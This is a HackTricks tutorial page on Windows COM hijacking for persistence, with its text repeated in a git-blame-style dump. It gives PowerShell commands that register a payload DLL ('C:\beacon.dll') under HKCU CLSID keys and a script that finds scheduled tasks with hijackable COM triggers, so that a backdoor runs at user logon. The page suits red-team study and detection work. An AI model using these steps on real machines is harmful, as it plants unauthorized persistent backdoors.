hacktricks/windows-hardening/windows-local-privilege-escalation/com-hijacking.md

# COM Hijacking

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

### Searching not existent COM components

As the values of HKCU can be modified by the users **COM Hijacking** could be used as a **persistent mechanisms**. Using `procmon` it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:

* **RegOpenKey** operations.
* where the _Result_ is **NAME NOT FOUND**.
* and the _Path_ ends with **InprocServer32**.

Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._&#x20;

```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
```

### Hijackable Task Scheduler COM components

Windows Tasks use Custom Triggers to call COM objects and because they're executed through the Task Scheduler, it's easier to predict when they're gonna be triggered.

<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs
$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
  if ($Task.Actions.ClassId -ne $null)
  {
    if ($Task.Triggers.Enabled -eq $true)
    {
      $usersSid = "S-1-5-32-545"
      $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

      if ($Task.Principal.GroupId -eq $usersGroup)
      {
        Write-Host "Task Name: " $Task.TaskName
        Write-Host "Task Path: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
      }
    }
  }
}

# Sample Output:
<strong># Task Name:  Example
</strong># Task Path:  \Microsoft\Windows\Example\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]</code></pre>

Checking the output you can select one that is going to be executed **every time a user logs in** for example.

Now searching for the CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** in **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.

```bash
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
               ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
```

Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00			`# COM Hijacking`

b 2024-07-19 09:06:54 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`<details>`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
			`</details>`
b 2024-07-19 09:06:54 +00:00			`{% endhint %}`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
			`### Searching not existent COM components`

			As the values of HKCU can be modified by the users COM Hijacking could be used as a persistent mechanisms. Using `procmon` it's easy to find searched COM registries that doesn't exist that an attacker could create to persist. Filters:

			`* RegOpenKey operations.`
			`* where the _Result_ is NAME NOT FOUND.`
			`* and the _Path_ ends with InprocServer32.`

			`Once you have decided which not existent COM to impersonate execute the following commands. _Be careful if you decide to impersonate a COM that is loaded every few seconds as that could be overkill._ `

			```bash
			`New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"`
			`New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"`
			`New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"`
			```

			`### Hijackable Task Scheduler COM components`

a 2024-02-08 03:06:37 +00:00			`Windows Tasks use Custom Triggers to call COM objects and because they're executed through the Task Scheduler, it's easier to predict when they're gonna be triggered.`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
			`<pre class="language-powershell"><code class="lang-powershell"># Show COM CLSIDs`
			`$Tasks = Get-ScheduledTask`

			`foreach ($Task in $Tasks)`
			`{`
			`if ($Task.Actions.ClassId -ne $null)`
			`{`
			`if ($Task.Triggers.Enabled -eq $true)`
			`{`
find os language independent users group by using the SID 2023-04-26 16:49:29 +00:00			`$usersSid = "S-1-5-32-545"`
			`$usersGroup = Get-LocalGroup \| Where-Object { $_.SID -eq $usersSid }`

			`if ($Task.Principal.GroupId -eq $usersGroup)`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00			`{`
			`Write-Host "Task Name: " $Task.TaskName`
			`Write-Host "Task Path: " $Task.TaskPath`
			`Write-Host "CLSID: " $Task.Actions.ClassId`
			`Write-Host`
			`}`
			`}`
			`}`
			`}`

			`# Sample Output:`
			`<strong># Task Name: Example`
			`</strong># Task Path: \Microsoft\Windows\Example\`
			`# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}`
			`# [more like the previous one...]</code></pre>`

			`Checking the output you can select one that is going to be executed every time a user logs in for example.`

			`Now searching for the CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} in HKEY\__CLASSES\__ROOT\CLSID and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.`

			```bash
			`# Exists in HKCR\CLSID\`
			`Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"`

			`Name Property`
			`---- --------`
			`InprocServer32 (default) : C:\Windows\system32\some.dll`
			`ThreadingModel : Both`

			`# Exists in HKLM`
			`Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" \| ft -AutoSize`

			`Name Property`
			`---- --------`
			`{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler`

			`# Doesn't exist in HKCU`
			`PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"`
			`Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.`
			```

			`Then, you can just create the HKCU entry and everytime the user logs in, your backdoor will be fired.`

b 2024-07-19 09:06:54 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`<details>`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
b 2024-07-19 09:06:54 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GitBook: [#3366] No subject 2022-08-12 23:51:41 +00:00
			`</details>`
b 2024-07-19 09:06:54 +00:00			`{% endhint %}`